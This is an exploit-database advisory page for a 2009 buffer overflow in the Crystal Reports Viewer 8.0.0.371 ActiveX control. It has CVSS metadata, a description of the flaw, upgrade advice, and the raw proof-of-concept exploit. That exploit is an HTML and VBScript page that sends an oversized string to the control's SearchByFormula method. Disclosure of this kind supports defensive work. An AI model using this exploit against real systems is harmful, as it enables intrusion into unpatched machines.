header-logo
Suggest Exploit
vendor:
Crystal Reports Viewer
by:
Matthew Bergin
9,3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Crystal Reports Viewer
Affected Version From: 8.0.0.371
Affected Version To: 8.0.0.371
Patch Exists: YES
Related CWE: N/A
CPE: a:business_objects:crystal_reports_viewer:8.0.0.371
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Crystal Reporting Viewer v8.0.0.371

A buffer overflow vulnerability exists in Crystal Reports Viewer v8.0.0.371 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by supplying a large string of data to the SearchByFormula function, resulting in a buffer overflow and potentially allowing arbitrary code execution.

Mitigation:

Upgrade to the latest version of Crystal Reports Viewer.
Source

Exploit-DB raw data:

<html>
Crystal Reporting Viewer v8.0.0.371
Author: Matthew Bergin
Website: www.berginpentesting.com
Website: www.smashthestack.org
<object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\WINDOWS\system32\crviewer.dll"
prototype  = "Sub SearchByFormula ( ByVal formula As String )"
memberName = "SearchByFormula"
progid     = "CRVIEWERLib.CRViewer"
argCount   = 1

arg1=String(65535, "A")

target.SearchByFormula arg1 

</script>

Navigation

Suggest Exploit

Services By CQR